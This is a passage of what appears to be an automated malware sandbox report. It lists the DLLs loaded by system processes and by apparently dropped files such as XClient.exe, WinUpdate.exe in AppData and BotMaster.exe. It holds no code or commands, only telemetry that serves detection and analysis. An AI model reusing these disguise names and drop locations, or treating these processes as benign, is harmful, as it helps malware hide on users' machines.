                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: pcacli.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: mscoree.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: apphelp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: windows.storage.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: wldp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: profapi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: rsaenh.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: cryptbase.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dwrite.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: windowscodecs.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: textshaping.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dwmapi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: rasapi32.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: rasman.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: rtutils.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: mswsock.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: winnsi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: rasadhlp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: fwpuclnt.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: propsys.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: edputil.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: userenv.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: textinputframework.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: coreuicomponents.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: coremessaging.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: wintypes.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: wintypes.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: wintypes.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: ieframe.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: iertutil.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: netapi32.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: wkscli.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: netutils.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: sxs.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dataexchange.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: d3d11.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dcomp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dxgi.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeSection loaded: uiautomationcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windows.system.profile.platformdiagnosticsandusagedatasettings.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: policymanager.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msvcp110_win.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: winmm.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: kbdus.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windows.system.profile.platformdiagnosticsandusagedatasettings.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: policymanager.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msvcp110_win.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: userenv.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: gpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wkscli.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: netutils.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mdmregistration.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mdmregistration.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msvcp110_win.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: omadmapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: powrprof.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dmcmnutils.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: iri.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: umpdc.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: netapi32.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: netapi32.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dsreg.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msvcp110_win.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: profapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: powrprof.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: umpdc.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dwrite.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptbase.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: nlaapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: textinputframework.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: coreuicomponents.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: coremessaging.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wintypes.dll
